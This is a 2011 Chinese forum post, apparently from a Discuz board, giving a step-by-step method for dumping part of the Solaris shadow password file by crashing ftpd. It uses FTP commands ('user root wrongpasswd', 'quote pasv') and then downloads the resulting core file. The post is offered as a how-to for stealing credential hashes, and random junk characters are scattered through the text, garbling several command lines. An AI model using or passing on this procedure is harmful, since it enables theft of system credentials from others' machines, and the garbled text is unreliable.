找回密码
 注册

QQ登录

只需一步,快速开始

如何用FIP获取shadow口令文件

[复制链接]
发表于 2011-1-12 21:01:38 | 显示全部楼层 |阅读模式
该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。具体过程如下:4 H4 A2 ~, G$ Q% X

9 }; u  e* X3 z8 }7 W  C; d1.通过 ftp 正常登录到目的主机上
: F2 V1 ~' Q( t% @0 c  z2 p
+ \/ A; x  ~, y+ C2.输入如下命令序列:
; x% R4 A* o5 F9 z5 q& y! ?4 J. T0 P$ v" @9 C" I
ftp> user root wrongpasswd
' A  c  i+ Z, T' H
. f, P$ P- l" h9 Yftp> quote pasv# n" _) L% P& C- T

( {6 ~  j: @, p2 i& Z9 S- f3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。* P2 B3 O! L) |, X1 O) ~  @7 E
/ D4 ~# {( y( D
4.再次进入FTP >get core8 H3 Y7 _7 p5 n, B) _$ j
& M/ P! c8 m" w8 z2 z7 ]1 p, O4 v
补充:虽然在core只有一部分shadow,但是对于系统来说已经是致命的打击了  W5 }9 p% y- O  k  k

& w' X+ p/ ]* v8 F3 x# x2 `
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港 ( 鲁ICP备19052200号-1 )

GMT+8, 2026-6-14 22:05

Powered by Discuz! X5.0

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表